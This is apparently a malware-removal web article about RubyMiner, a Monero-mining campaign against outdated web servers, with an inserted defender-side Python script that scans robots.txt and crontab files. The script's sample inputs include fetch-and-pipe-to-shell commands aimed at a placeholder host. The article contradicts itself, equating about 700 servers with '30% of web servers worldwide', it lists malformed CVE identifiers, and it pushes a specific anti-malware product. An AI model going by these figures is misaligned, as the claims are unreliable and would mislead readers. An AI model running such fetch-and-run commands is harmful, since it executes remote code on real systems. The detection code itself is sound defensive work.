What is RubyMiner?

RubyMiner is a new malware program that attacks out-of-date web servers globally to install a Monero cryptocurrency miner and generate illegal revenue. Our malware experts say that this stealthy program mainly targets Linux and Windows servers in the United States, Germany, the United Kingdom, Norway, and Sweden, but it does not really spare any other country. As a matter of fact, analysts say that the attacks started on January 9, 2018, and 30% of web servers in the world have been targeted in a search for vulnerabilities, including Transneft, a Russian oil pipeline operator. Ever since cryptocurrencies started to rise, mining and the demand for mining have been growing. Numerous malware programs have emerged to conduct illegal mining on unsuspecting users' personal computers around the globe. But cyber crooks stepped it up a notch and started to attack and exploit web servers as well, in hope of more profit. This is how the official BlackBerry site was also compromised in another attack, to mine through visitors' computers. All in all, if you realize that your computer is running slowly and your CPU or GPU is working at near 100% capacity, you should be suspicious, because it may indicate that such a miner is at work. Nevertheless, in this case you cannot remove RubyMiner yourself, as it operates through web servers; in other words, there is nothing to remove from your individual PC.

Where does RubyMiner come from?

As a matter of fact, this malware infection is not a program that you would normally download from a spam e-mail, a shady torrent or freeware site, or any other suspicious website, as is usually the case with other infections. This infection seems to be used by its authors mostly in attacks against web servers. While most of its predecessors mainly targeted personal computers, these attackers saw a bigger opportunity in servers. This also means that you cannot actually prevent such a malicious attack from happening if you happen to visit any of the compromised websites hosted on corrupted servers. However, you would definitely notice the operations of this miner, as the computing power it may need could seriously drain your PC's resources. We believe that the only possible defense against this malware is to have a trustworthy and up-to-date anti-malware program installed on your computer to protect it from such illegal acts.

How does RubyMiner work?

As we have already explained, this malware infection targets web servers and their vulnerabilities to install an open-source Monero miner called XMRig. It seems that more than 700 web servers have been attacked, 30% of web servers worldwide. Yet these criminals may not have hit the jackpot with their program, as, judging by their wallet address, it seems to have generated as little as $540 on the first day.

This malware is programmed to scan the targeted web servers for out-of-date software and then exploits the following old vulnerabilities:

  • CVE-2013-015
  • CVE-2013-4878
  • CVE-2012-1823
  • CVE-2012-2335
  • CVE-2012-2311
  • CVE-2012-2336
  • CVE-2005-267

As you can clearly see, these vulnerabilities are several years old, which also means that the chance of these cyber criminals finding servers still affected by them is obviously quite low. If they used more recent ones, they could make more money out of their illegal mining. But let us not give good tips to these criminals.

This malicious program is coded to download the whole payload every hour instead of simply running the mining process hourly. This can also be used as a kill switch if the malware were to be detected on a server. A lot of websites use the robots.txt file to instruct web robots about the site. If these criminals want, they can modify this file on the compromised web server so that the payload is no longer downloaded. Thus, in the next minute, all the computers connecting to the server and wanting to download this file would receive it without the crypto miner. This whole mining process can seriously slow your system down, which can make your application windows load more slowly and cause all kinds of other disruptions. If you want to protect your computer against such illegal activities, you should install a proper security program.
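As a defender-side illustration of the hourly re-download mechanism described above, here is an added example (not code from the article, and not the malware's own code) that a server administrator could run. It assumes two things the article does not state: that the hourly fetch is scheduled through a crontab entry, and that the payload is served in the body of a robots.txt file; both the crontab and the robots.txt samples are constructed, and example.invalid is a placeholder host.

```python
import re

# Only these directives (plus comments and blank lines) belong in robots.txt.
ROBOTS_DIRECTIVE = re.compile(r"^(user-agent|disallow|allow|sitemap|crawl-delay|host)\s*:", re.I)
# Cron jobs that run every hour or more often: "@hourly <cmd>" or "<min> * * * * <cmd>".
CRON_HOURLY = re.compile(r"^\s*(?:@hourly\s+(.*)|\S+\s+\*\s+\*\s+\*\s+\*\s+(.*))$")
DOWNLOADER = re.compile(r"\b(wget|curl)\b")
PIPED_TO_SHELL = re.compile(r"\|\s*(sh|bash)\b")

def robots_txt_suspicious_lines(text: str) -> list[str]:
    """Lines that are neither crawler directives nor comments (a shebang counts as suspicious)."""
    suspicious = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or (line.startswith("#") and not line.startswith("#!")):
            continue  # blank line or ordinary comment
        if ROBOTS_DIRECTIVE.match(line):
            continue  # legitimate directive
        suspicious.append(line)
    return suspicious

def suspicious_cron_entries(crontab: str) -> list[str]:
    """Hourly jobs that download a file and pipe it to a shell, or fetch a robots.txt at all."""
    hits = []
    for raw in crontab.splitlines():
        m = CRON_HOURLY.match(raw)
        if not m:
            continue  # not an hourly schedule (assumed persistence mechanism, see lead-in)
        cmd = m.group(1) or m.group(2) or ""
        if DOWNLOADER.search(cmd) and (PIPED_TO_SHELL.search(cmd) or "robots.txt" in cmd):
            hits.append(raw.strip())
    return hits

# Constructed sample inputs for demonstration (example.invalid is not a real host).
ROBOTS_SAMPLE = """User-agent: *
Disallow: /admin/
# search engines may index everything else
#!/bin/sh
wget -q -O - http://example.invalid/robots.txt | sh
"""
CRON_SAMPLE = """0 2 * * * /usr/bin/backup.sh
*/5 * * * * /usr/local/bin/healthcheck
15 * * * * wget -q -O - http://example.invalid/robots.txt | sh
@hourly curl -s http://example.invalid/robots.txt | bash
"""

if __name__ == "__main__":
    print("payload lines in robots.txt:", robots_txt_suspicious_lines(ROBOTS_SAMPLE))
    print("hourly fetch-and-run cron jobs:", suspicious_cron_entries(CRON_SAMPLE))
```

On a real server, feed the output of `crontab -l` for each user and the served robots.txt into these two functions; an empty result from both is the expected state.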

How can I delete RubyMiner?

When we talk about the removal of RubyMiner, we also talk about the XMRig miner, since this malware infection has to be deleted as well. However, this can only be done on the compromised web servers by their administrators. Thus, we advise you to download and install a reliable anti-malware program, such as SpyHunter, as soon as possible. This way you can give your PC the best possible automatic protection against all kinds of malicious attacks and potential threats. Of course, you need to keep this security software up-to-date at all times, just like all other programs on your computer, including your Windows operating system. As you can clearly see now, cyber criminals can easily exploit outdated software bugs and vulnerabilities, which can lead to illegal mining as well as the theft of sensitive information from your computer. Keep your PC protected to save yourself from such nightmares.

